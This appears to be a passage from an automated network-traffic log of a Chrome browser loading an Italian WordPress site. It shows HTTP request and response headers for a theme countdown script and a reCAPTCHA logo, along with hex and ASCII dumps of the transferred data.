                                                                                                                                              2025-01-03 16:33:03 UTC16384INData Raw: 2a 9c 46 12 7a 8c dc c9 62 5b b8 59 ee 16 0b 29 04 04 b5 61 e5 96 f4 d4 08 b2 3c 7e df f7 fd 7d 8f 5e 9e 89 49 52 07 fc 85 74 17 03 ab 12 db f5 bc 61 8d 49 ea 63 91 7f c5 cf e1 62 0f 5f 7e 1f 9f bf f4 0d 1a 3d 47 d4 3f 45 a6 6e ef d2 62 84 34 59 ba d6 85 88 3e 76 b7 a0 8c a8 50 e4 44 92 e2 c5 34 ca 63 12 3a 83 31 54 6d c1 7a f3 bf 88 fd 9f c3 f1 5e 14 71 13 24 85 af 0a 14 8c 42 12 d9 f1 38 1c 40 c8 b9 4c 0b e6 91 30 27 12 95 59 09 96 b7 da 3d b7 e0 97 6c e7 f0 1e 39 89 e0 0b c5 ab 0b 83 ed 14 b4 23 0f 3e 62 89 95 c3 f8 cc 89 89 1c 3f 1e 84 87 ca 84 a9 7d d6 22 dd e2 16 01 70 23 f3 3b f8 d4 d7 65 ee 6f 5b 75 bd 61 74 59 fb 7b 15 f1 30 71 70 b4 ac 89 df 25 b0 a2 c2 59 61 6c 4f c5 48 a8 f3 bc 12 1f 94 f2 ba 2b b9 1f 31 95 6f aa af 87 7c 16 5f 06 e0 12 f0 72
                                                                                                                                              Data Ascii: *Fzb[Y)a<~}^IRtaIcb_~=G?Enb4Y>vPD4c:1Tmz^q$B8@L0'Y=l9#>b?}"p#;eo[uatY{0qp%YalOH+1o|_r
                                                                                                                                              2025-01-03 16:33:03 UTC16384INData Raw: 9b 6e ec 03 0b 5e 2b ae b8 99 70 e5 49 b9 09 2b 29 60 81 76 33 30 35 f2 90 b1 1c 00 37 06 fb 92 2b 80 7a bd 5a 42 c7 87 e5 6a 6a 48 e6 59 bc ba c1 b0 f3 d2 14 3f e3 40 75 34 f4 e5 4e ba b4 39 bb 57 3f 11 1d 9b 32 65 54 90 05 91 6d 5d a2 28 50 dc a4 15 6e 43 6d fa 6b 90 2a e8 75 4d 88 96 a4 12 4a 49 1a 1f 21 5d af fc b4 68 65 4e ef 12 92 96 21 a8 ff 00 6d 8d bc ee 62 4d cc 8f 4c f9 61 e2 6c 79 f7 81 b5 78 41 1e e8 f7 06 0d 61 a9 8f 2a 14 03 c1 e7 9e aa d4 19 26 a4 28 07 36 66 af 27 ae f4 ad 9a 25 21 65 c2 72 96 51 6a f3 b0 f9 9c 07 df 58 13 43 d3 8e a4 62 c3 55 8c 32 c9 4d 37 91 f5 b8 5b 20 86 b5 50 4d d9 e1 45 d7 3c 74 ad 52 d4 80 92 5f 2b f9 94 a8 74 03 5b 33 b1 e8 1c 71 fd 3c b2 b2 b7 52 8a 40 4e 81 24 82 5b a3 80 fa bb 06 a1 8f 43 9f 09 5d bd a4 e9 3f
                                                                                                                                              Data Ascii: n^+pI+)`v3057+zZBjjHY?@u4N9W?2eTm](PnCmk*uMJI!]heN!mbMLalyxAa*&(6f'%!erQjXCbU2M7[ PME<tR_+t[3q<R@N$[C]?
                                                                                                                                              2025-01-03 16:33:03 UTC16384INData Raw: 08 69 42 fd cf 27 81 cd 9f 39 fc 56 03 bd 5b 91 e1 20 ea 1f ca a4 f2 f6 f0 14 99 89 51 0a 0d 52 34 2d 5e a6 9e ad 48 53 6e e3 54 76 70 58 ac 81 54 b5 02 19 15 54 31 dc 1d 48 ae 7d ac 9f 02 89 ba d9 9c 38 65 4a 4a 7a 87 0e 1b ad 3a 8d 29 12 11 35 ae 7a f3 fa 16 e7 bf d9 d7 85 dd d0 32 fc a6 7f e4 34 6a 4b c8 db 95 99 54 7d 00 ef 70 0b 02 2e f6 91 e0 fb f5 05 5c 31 94 02 68 49 d4 8d dd b4 f3 2c 44 10 ce 4a 81 04 9b 16 b9 bf 94 32 75 3e e0 93 22 76 30 ba 32 86 93 6b 8b a0 a0 8f a1 bd 85 0a 00 37 9f 23 82 0f 57 58 7c 1a 65 4b 01 47 fb 2b 5b 6b e7 00 70 56 1b 6d 8f 38 90 3b 6f 51 df 0c 2f 23 59 0d 76 2d ad 65 ae 38 b1 5e e4 0e 00 f6 e3 aa 5c 73 49 70 28 e5 4e 6a 5b 50 74 1a d0 6e dd 22 c6 54 92 40 2d 42 1c d5 d9 b5 bf 58 77 e7 cb 0e 54 60 6e 2e 59 d8 0b 5a 57
                                                                                                                                              Data Ascii: iB'9V[ QR4-^HSnTvpXTT1H}8eJJz:)5z24jKT}p.\1hI,DJ2u>"v02k7#WX|eKG+[kpVm8;oQ/#Yv-e8^\sIp(Nj[Ptn"T@-BXwT`n.YZW
                                                                                                                                              2025-01-03 16:33:03 UTC16384INData Raw: 70 b3 54 8c eb 08 24 f7 41 44 96 d1 95 6a be cc 00 3a c6 67 89 70 d9 45 4a 4f 74 00 24 9c c1 a9 ca da 33 86 be f7 8b 6b a8 c6 33 b0 d3 b8 74 6c a9 30 3b 87 0a 41 95 1c b8 ee 23 98 3c 64 11 91 0b 0b fa c6 c5 0b 56 02 9a 20 f9 e8 93 3b f9 72 ff 00 5b 80 9e ac 36 3f 0f 34 4e 33 65 ab 2a 94 80 29 91 43 c5 6a 1a d4 82 76 6a 8e 15 8d c5 f0 1e 2d 2e 74 b3 de 61 31 09 ee e7 24 82 b4 f7 46 8a 96 b0 e0 04 4d 62 16 18 3a 5f c4 2b 16 7b e1 3f e3 17 d5 4e e4 f5 37 b5 fd 27 ee 5d 7e 3c e7 c9 ce fc 36 ed 46 05 96 6c bd 3a 3b 19 09 f3 09 25 33 11 46 e4 70 ce ac a0 82 17 cf 5e dd f0 77 e2 27 69 78 9f 1d 47 07 e3 3c 45 78 ec 2a c2 52 d8 8f 14 c6 24 24 27 38 29 19 5a 8d 97 cd 8d 3b f1 0b b1 9d 90 e2 dc 0f 8c f1 cc 1f 67 e4 61 a7 a3 01 88 c7 4a 9d c3 47 e9 54 8c 54 89 45 48
                                                                                                                                              Data Ascii: pT$ADj:gpEJOt$3k3tl0;A#<dV ;r[6?4N3e*)Cjvj-.ta1$FMb:_+{?N7']~<6Fl:;%3Fp^w'ixG<Ex*R$$'8)Z;gaJGTTEH
                                                                                                                                              2025-01-03 16:33:03 UTC16384INData Raw: c6 9d 54 c4 d9 0e bf 2e 36 51 f5 59 2c 3a f2 ec 6c ae 2f c0 f8 ff 00 18 c6 70 fc 0c d9 b8 44 4b 13 90 80 42 13 89 96 b9 7d ec dc 30 51 56 64 f7 73 d0 92 e4 0f 99 d2 54 d1 f6 0e 01 58 2f 8a 7f 0a 7b 3d 80 e3 d3 70 98 ac 72 f0 d8 89 09 c6 61 a6 cb 5f 11 e1 18 ec 1e 31 28 c2 e2 26 ca 96 55 3b f4 f3 f0 e3 bc 9e 12 85 12 94 a8 10 09 8e c3 fa 0b eb cf 65 7c 4c f6 6e 2f ab dd 8d 9f 8f 97 a5 f7 34 8f 98 31 a3 92 33 91 81 2b 30 46 c2 cb 40 db 92 5c 7d 8a ad b8 8e 49 00 9a 23 af 1d e0 5c 7e 67 6a b8 97 1b e2 58 99 0a e1 fc 57 fd d2 72 e7 70 d5 24 2e 6c a2 12 99 72 e5 2e 65 55 44 a7 32 14 0f 74 b0 a3 95 4a 22 3c ef b6 9d 90 9d d8 21 c2 f8 04 e9 aa c6 70 d9 7c 36 54 ac 27 11 00 99 58 99 65 4a 99 33 11 2d 4c ea cc a5 64 52 47 89 25 3e 24 8d 67 e3 12 33 e3 ff 00 2d 8b
                                                                                                                                              Data Ascii: T.6QY,:l/pDKB}0QVdsTX/{=pra_1(&U;e|Ln/413+0F@\}I#\~gjXWrp$.lr.eUD2tJ"<!p|6T'XeJ3-LdRG%>$g3-
                                                                                                                                              2025-01-03 16:33:03 UTC16384INData Raw: 8b af 3d 30 5c 75 10 a3 e6 20 78 ba fd bf e9 7d 1e 06 b3 a6 c7 f1 fc c6 a4 8d b7 e2 ec 02 7d 88 f2 28 73 cf df da ba 50 d4 a8 25 f9 b4 60 30 55 05 48 3c fb f2 09 f7 e3 a5 1c 51 72 f0 1b 32 9e 78 1c d1 3e 05 dd 7f c6 c7 4a 39 18 06 c9 fc b4 68 58 ff 00 53 f6 1f fc bf 7e 94 28 c5 f9 34 78 ff 00 be 3a 50 a0 0e 94 28 3d a6 29 39 a9 40 1b 1e 49 fb 11 c8 fd 47 07 f5 aa e4 f4 c5 d8 75 fc 18 74 bf fa 83 cb ee 61 d2 f4 69 01 bb e2 fd b8 24 df 16 7f 4f d7 9e 85 13 54 09 04 0d 60 48 d7 6a 8b 20 db 79 a3 55 fe 60 49 02 b8 17 c7 27 fa 74 a1 a9 49 0e ed 1b 30 06 f6 95 6a 27 6a a1 b0 d5 e6 85 9e 7e fc fd ba 50 f8 da 35 6d c2 e8 86 07 e8 e6 ac 8f 37 f7 17 40 57 fc fa 50 a2 5c f4 3c ba fa 87 a4 91 40 91 30 52 45 8b 64 04 6e 17 54 03 57 9f bf b7 4c 5a 48 93 39 45 88 52 6d
                                                                                                                                              Data Ascii: =0\u x}}(sP%`0UH<Qr2x>J9hXS~(4x:P(=)9@IGutai$OT`Hj yU`I'tI0j'j~P5m7@WP\<@0REdnTWLZH9ERm
                                                                                                                                              2025-01-03 16:33:03 UTC16384INData Raw: 9e 3f 29 b8 de 26 46 37 b4 dc 53 1b 84 98 26 61 71 38 fc 44 ec 3c c4 f7 80 2d 2b 9c 4e 71 de 00 58 f2 a5 77 8b b7 db 90 33 69 18 bb 64 2e 02 a3 16 54 b2 ac 76 28 b5 5f ab 82 48 fb 91 f6 b1 d5 7c c2 73 aa a6 fa 1e 43 d9 8b ac ab 5c b4 92 4b 91 43 ad db e8 18 1b 50 1a c4 47 ea 06 a9 89 a7 6b fa 5c ba ae 60 c7 c2 83 52 43 be 60 55 55 23 82 c9 a3 66 96 89 ae 7f 6e 87 c4 12 a9 d2 25 4b 96 92 56 99 0b ca 13 75 2b 29 61 c9 e9 56 04 53 61 1e a7 f0 2f b4 3c 03 b3 1f 10 70 bc 4f b4 3c 4a 47 0a c0 a2 5a 56 67 e2 94 12 81 91 68 24 a9 45 b2 a4 33 bb 52 ac f6 33 cf c4 97 af 1d b5 dd 9d ab 83 da fa 1f a8 52 ea ba 16 36 83 db ed 87 a2 8c cc b3 a6 c5 9b 0e 1c 10 ca d1 62 4d 14 31 06 59 37 90 22 0d 1a b3 bb 2d 16 6a f2 ce c5 f6 73 1f 81 c4 4f c4 e3 30 5d d4 f4 63 27 94 4e
                                                                                                                                              Data Ascii: ?)&F7S&aq8D<-+NqXw3id.Tv(_H|sC\KCPGk\`RC`UU#fn%KVu+)aVSa/<pO<JGZVgh$E3R3R6bM1Y7"-jsO0]c'N
                                                                                                                                              2025-01-03 16:33:03 UTC16384INData Raw: bc 6e 0a 0c 60 79 36 3a 8b 30 82 0b 29 88 07 7f d9 bc ff 00 c8 32 12 80 f9 f5 d5 a8 06 fc f5 d0 42 97 c8 42 26 36 76 ef 60 05 16 fa 94 8b 5a da 18 10 68 ee 22 8d 11 7e fd 47 50 19 41 70 4b d4 83 ef 97 48 7a 47 8c e5 24 8c ae e6 a2 e2 9d 75 b8 b5 8d e1 07 39 3e 73 9f 9b 23 29 50 55 9d e3 20 2a 03 4b e0 03 c8 e0 10 3c f9 e8 c0 3e a0 75 f7 ef 94 3c ab 28 f1 1a f2 db e9 05 74 dc 64 96 67 7d ea ee 18 08 ca f0 c8 b1 d0 04 9f a8 28 a7 37 63 cd 71 d7 54 42 52 05 da ae 2b a9 14 84 8f 1a b3 0b 1a 07 bb d2 2c af 60 e9 e3 6c 26 ad 5f 82 16 26 62 76 95 01 de ac 78 f1 ed c9 3d 67 b1 eb 4d f4 19 8b 72 05 fe df 9d 62 76 5c b2 c0 1a 01 60 2b f8 f3 e5 16 c3 b5 fb 6c 49 3c 32 0f ae 46 43 f4 ec fe 55 ee dd 18 70 bc ad 42 41 1c 1e 78 af be 53 19 88 a9 0e 52 1c 50 16 2f 56 7a
                                                                                                                                              Data Ascii: n`y6:0)2BB&6v`Zh"~GPApKHzG$u9>s#)PU *K<>u<(tdg}(7cqTBR+,`l&_&bvx=gMrbv\`+lI<2FCUpBAxSRP/Vz


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              90192.168.2.164981689.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:03 UTC674OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/countdown/countdown.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
                                                                                                                                              2025-01-03 16:33:03 UTC276INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:03 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 2939
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:30 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:03 UTC2939INData Raw: 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 2f 2f 20 0a 2f 2f 20 41 56 49 41 20 43 6f 75 6e 74 64 6f 77 6e 0a 2f 2f 20 0a 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 28 66 75 6e 63 74 69 6f 6e 28 24 29 0a 7b 20 0a 09 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 09 0a 09 76 61 72 20 5f
                                                                                                                                              Data Ascii: // -------------------------------------------------------------------------------------------// // AVIA Countdown// // -------------------------------------------------------------------------------------------(function($){ "use strict";var _


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              91192.168.2.1649821142.250.185.1644436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:03 UTC715OUTGET /recaptcha/about/images/reCAPTCHA-logo@2x.png HTTP/1.1
                                                                                                                                              Host: www.google.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                              X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlaHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:33:03 UTC778INHTTP/1.1 200 OK
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/recaptcha
                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="recaptcha"
                                                                                                                                              Report-To: {"group":"recaptcha","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/recaptcha"}]}
                                                                                                                                              Content-Length: 18160
                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                              Server: sffe
                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                              Date: Fri, 03 Jan 2025 16:04:12 GMT
                                                                                                                                              Expires: Fri, 03 Jan 2025 16:54:12 GMT
                                                                                                                                              Cache-Control: public, max-age=3000
                                                                                                                                              Age: 1731
                                                                                                                                              Last-Modified: Wed, 29 Jul 2020 17:15:00 GMT
                                                                                                                                              Content-Type: image/png
                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                              Connection: close
                                                                                                                                              2025-01-03 16:33:03 UTC612INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 98 00 00 01 d0 08 06 00 00 00 9c 30 7c 54 00 00 46 b7 49 44 41 54 78 da ec 9d 5b 6c 5c 47 19 c7 47 71 5b 01 6a cb 03 2d a8 d9 99 b3 be a4 b5 89 51 aa 62 89 e4 cc cc 3a de 3d 9b 4b 9b 36 40 23 4b 50 de 00 55 08 21 28 42 26 21 e5 c1 69 bc 17 97 ab a0 8a 6a 10 42 bd 24 3e 67 f6 ec da 25 14 28 0d 75 02 0f 48 08 54 a4 92 aa e4 a1 94 92 50 35 71 13 db bb 67 77 bd 89 bd cc d9 d8 84 48 ae 62 3b de 62 ef f9 ff a4 bf 66 bd 96 fc 64 9d 9f e6 fb be 33 43 00 00 00 00 b0 42 f4 f7 57 d7 59 df cd 6f 8c a7 bc 87 63 e9 d2 3e 6b a0 f0 4d 24 78 89 0e 4c ec df fa e8 78 22 f2 ad 7f ff 40 f6 9d 3e c4 fb 4e ff 5c c7 16 7d 6f 3e 27 fa ce fc 5a ec 3d f3 62 64 ef 5b 63 91 fd 67 8f 77 ec 39 7e 94 f2 e1 0c 13 ea b0 21 9d a7 0c
                                                                                                                                              Data Ascii: PNGIHDR0|TFIDATx[l\GGq[j-Qb:=K6@#KPU!(B&!ijB$>g%(uHTP5qgwHb;bfd3CBWYoc>kM$xLx"@>N\}o>'Z=bd[cgw9~!
                                                                                                                                              2025-01-03 16:33:03 UTC1390INData Raw: af 32 d3 dd d1 12 55 ed d4 54 ef 27 00 80 d5 df 8f f1 25 63 f9 92 49 43 32 c8 bb 08 e6 c1 13 57 04 53 f7 a8 ab 76 3f ec bf e2 c9 4d 50 91 7b 5b 7f f7 37 26 ec 17 b4 74 9e 08 0b f5 85 70 c4 fe f8 86 88 ba 9d 00 00 56 e3 4e 46 35 f5 a4 4a cd ba 16 ff 1d 2b 35 3d 6e 25 bd c0 3f 54 91 b9 24 97 2e 98 fa 8b 47 4b 87 bb 15 26 b3 05 2d 9e f3 fa bb 33 3a 27 28 b7 87 18 b7 bf dc 12 cd dd 7d 9b f8 d9 2d 04 00 b0 7a 76 32 b1 83 13 6d b1 54 e1 fb 56 aa 52 84 64 90 5a 92 de 0a 08 a6 fe e2 61 7e 8f 47 8e 78 7a bd 10 e2 ea 4d fd fd 4b 54 b8 07 98 50 bb 9b b7 0c 37 13 00 c0 ea e8 c9 58 e9 e2 68 3c 7d d1 83 64 90 9a 60 0e 4e 55 3b 3e 7d 7c 5e 30 6b 23 22 53 31 e4 c8 94 5e cf 69 d1 bc c2 b8 33 4c fd 72 9a 39 7c 4f 73 cf d8 fb 08 00 e0 ff 53 2e 8b 3e 56 b9 3b fe 78 79 34 9e
                                                                                                                                              Data Ascii: 2UT'%cIC2WSv?MP{[7&tpVNF5J+5=n%?T$.GK&-3:'(}-zv2mTVRdZa~GxzMKTP7Xh<}d`NU;>}|^0k#"S1^i3Lr9|OsS.>V;xy4
                                                                                                                                              2025-01-03 16:33:03 UTC1390INData Raw: 1c c7 eb a1 05 b5 50 2f 22 24 33 bb c9 f6 66 11 c1 1e da 9d d9 6d b3 ef 4d a3 a9 88 62 0d 68 11 73 2b ea ad 08 4a f1 90 25 ec bc 97 58 4f 95 1e 8a 27 2d 68 f6 cd 26 22 82 7f ea 41 14 a4 28 f1 4f 63 d3 d2 7a 10 5b 28 36 91 98 ec ee bc 9d cd a6 19 67 77 b3 61 b5 08 ad 79 49 76 77 be 1f f8 5e e7 f8 3e bc f9 fe de 7b c8 5d 24 62 4e 96 75 23 7b 3e 7a 50 c4 db fa b7 58 b0 73 e9 8e 8b cb 0d b9 40 30 40 a9 64 68 26 3f 44 79 e9 37 82 5d 4c 8b 0a e6 b3 d0 2f e6 2d 9b e4 c4 b2 66 e4 ae 44 8d ec 91 76 94 4b 57 fc ac a1 19 ce 74 a3 73 81 60 80 32 06 d3 33 3b fa 32 c5 21 62 97 7e 21 4c 56 42 bf a0 b7 a8 60 62 10 4c 6b c7 74 aa bd cc 5c 4f d2 39 a1 c5 c5 bd 6d d3 b9 90 da ce e5 92 b6 ba 73 81 60 80 42 b9 f8 3b a9 5d 3c 61 71 ef 77 ca dd 95 d0 2f e6 10 0c b2 9e 98 a2 fa
                                                                                                                                              Data Ascii: P/"$3fmMbhs+J%XO'-h&"A(Ocz[(6gwayIvw^>{]$bNu#{>zPXs@0@dh&?Dy7]L/-fDvKWts`23;2!b~!LVB`bLkt\O9ms`B;]<aqw/
                                                                                                                                              2025-01-03 16:33:03 UTC1390INData Raw: 44 40 08 11 51 54 b5 bc 20 a8 2a fa 00 02 2a f5 01 26 b1 cf 99 49 82 80 52 2e 02 a9 05 71 49 76 67 d7 01 04 08 68 41 a8 20 48 69 10 f0 82 40 50 89 a2 f0 40 44 c1 8e e7 ba 8e ed e9 99 43 56 aa 2a 23 bc f6 da 3b 76 fe 3f e9 af 5d c9 6f 5e ef f9 f9 fb be 73 ce b4 4a d6 1a 1b f0 af d9 e0 36 3e 64 6e 82 05 15 99 4a 30 a8 60 10 08 06 b4 0e 13 fe 6a ea c4 bb 98 88 27 a8 08 b0 a0 22 53 b5 c8 50 c1 20 10 0c 68 8d b2 9d 9e 40 79 f0 7b ca a3 af a5 64 b0 98 22 68 91 21 10 0c 68 0f 4c 84 9b a9 93 bc c7 1c b4 c6 10 08 06 81 60 40 9b a0 83 f1 0a 4b 84 8f 51 11 1d c2 75 30 08 04 83 40 30 a0 2d 6c 7a e0 b3 63 ca 83 fe 6f 98 93 7c c1 d0 1a 43 20 18 04 82 01 ed 82 39 e1 c5 54 24 2f 61 ee 82 40 30 08 04 03 da 38 d8 1f 3e 85 89 70 2b 13 c9 41 9c 79 41 a6 2b 98 73 af 78 35 25
                                                                                                                                              Data Ascii: D@QT **&IR.qIvghA Hi@P@DCV*#;v?]o^sJ6>dnJ0`j'"SP h@y{d"h!hL`@KQu0@0-lzco|C 9T$/a@08>p+AyA+sx5%
                                                                                                                                              2025-01-03 16:33:03 UTC1390INData Raw: cd 76 59 5e 04 43 07 46 a8 12 cc 22 20 7b f4 73 b6 cb 0c 5b 99 21 18 30 0d 2e 77 e2 95 59 0b 86 89 70 02 5b 93 3b 1c 11 1e 96 4b f2 26 e5 e1 45 5b bc 96 17 65 d5 2e a3 4e fc 76 53 32 39 98 c1 48 c1 f8 8b 45 30 4d c9 1c 47 f4 ea 63 78 c0 19 04 03 7e 00 53 8c 5e 65 39 c9 fb 18 ee 77 5e 2e 6a e6 c2 a3 ba 65 27 67 17 6c bb ab 30 23 9a 33 99 b8 39 93 e9 74 05 13 98 5b 47 98 12 cc 22 62 6d b6 95 d9 a8 ed 94 99 84 64 20 18 30 05 e5 87 d2 13 28 f7 ef 66 3c c2 70 bf 93 11 91 8a 29 82 3f 96 ed d1 d3 0b b3 47 b5 cb 4c 1e be 65 b9 87 d4 4c a6 a3 82 e1 81 12 cc 62 dc 7d 49 8a 95 3b 88 51 1b c7 36 66 08 06 fc 1f 8c 07 6b 2c 11 0d 51 07 cf db ef e4 7f f9 b2 d2 98 90 ef ef 2f db c3 a7 b4 f5 f3 bd 47 49 a6 39 93 81 60 e6 08 4d af dc a6 19 f5 31 9c fc 87 60 c0 61 d2 34 5d
                                                                                                                                              Data Ascii: vY^CF" {s[!0.wYp[;K&E[e.NvS29HE0MGcx~S^e9w^.je'gl0#39t[G"bmd 0(f<p)?GLeLb}I;Q6fk,Q/GI9`M1`a4]
                                                                                                                                              2025-01-03 16:33:03 UTC1390INData Raw: e7 49 5d 97 1d a9 60 9a 46 0a 46 cb e5 1d 25 97 ca 0f dd 7d 90 0b 04 93 5e f4 10 1d f5 9a ef 63 b9 65 82 c1 3e 0f 6a d1 87 54 07 fb 29 c5 7e 3e 0a fe 03 9d c9 9c 8c 60 28 13 77 9b 26 98 ae 05 3a 73 d9 85 cc 05 82 49 3d c4 11 8b a9 d7 f8 02 82 49 ee 8d 17 ca e4 06 aa 1f 10 4b 37 77 3e df ce 64 5a 13 10 cc 24 72 e9 1b 46 e6 02 c1 98 b1 9e bf c0 c4 43 94 05 fb 21 98 24 aa 97 20 b4 59 50 25 83 ad 52 8f 9a 35 ca 18 00 8d 32 19 47 7c 79 5c c9 44 95 9d 16 4c c3 18 c1 64 73 95 59 c8 5c 20 18 63 b8 8b 87 17 13 b7 ee 10 2e 6b 68 51 4e 26 7b a1 4c 8e 50 16 5e 62 58 ae a7 24 53 d7 99 cc e4 82 91 4d e2 89 c5 5a 30 06 04 fa dd f9 ca 77 c8 5c 20 18 63 b8 7d b0 7a 3d 71 e5 3a ec 1f 8b fd b4 ff d0 ab d4 6d 14 75 f5 62 18 0b d7 2a c9 b8 62 3b f5 c6 5b 93 5c 91 8d 1f 11 4c
                                                                                                                                              Data Ascii: I]`FF%}^ce>jT)~>`(w&:sI=IK7w>dZ$rFC!$ YP%R52G|y\DLdsY\ c.khQN&{LP^bX$SMZ0w\ c}z=q:mub*b;[\L
                                                                                                                                              2025-01-03 16:33:03 UTC1390INData Raw: 99 f8 88 e4 ca 6b 1b 67 6f ba f2 84 00 d0 73 81 08 98 4c 86 4a 39 45 a2 74 ed 88 28 21 60 cc b9 07 59 74 d0 53 d1 b7 c6 78 04 82 00 d2 b0 2c d6 98 67 41 cf 05 22 60 cc 41 f4 85 4b 45 5f ec 18 02 c6 a4 5b f4 57 84 7b c5 8a e8 b2 b2 1d 58 a2 9c 9e 4b 91 35 ea b9 04 11 2e 30 ae d5 c9 06 ac 0e f6 81 00 78 67 30 91 c5 14 2e 1d 58 a2 6c ce 23 92 29 ac 3b 45 5f 48 8c 3f f6 17 a4 57 b8 c4 7b 2e 08 17 38 6a 06 73 95 5e 37 09 80 37 60 fa 57 88 52 f8 37 04 8c 39 4b 94 45 29 f6 5d 49 65 78 a6 00 d2 2a 5c d0 73 81 e3 04 4c c8 e6 54 3f 11 00 6f c0 84 5f 15 bd d1 93 08 18 93 1a fc 52 74 27 95 c8 a6 0a 20 3d c2 a5 38 30 c7 52 20 ff 8a 70 81 e3 04 4c 38 cb a9 79 05 c0 07 0d 8a ab c8 53 08 98 54 8d e8 1e 6f f8 06 f9 a1 cb d7 ff 94 00 d2 20 5c d8 9c a9 76 f6 13 7a 2e f0 0e
                                                                                                                                              Data Ascii: kgosLJ9Et(!`YtSx,gA"`AKE_[W{XK5.0xg0.Xl#);E_H?W{.8js^77`WR79KE)]Iex*\sLT?o_Rt' =80R pL8ySTo \vz.
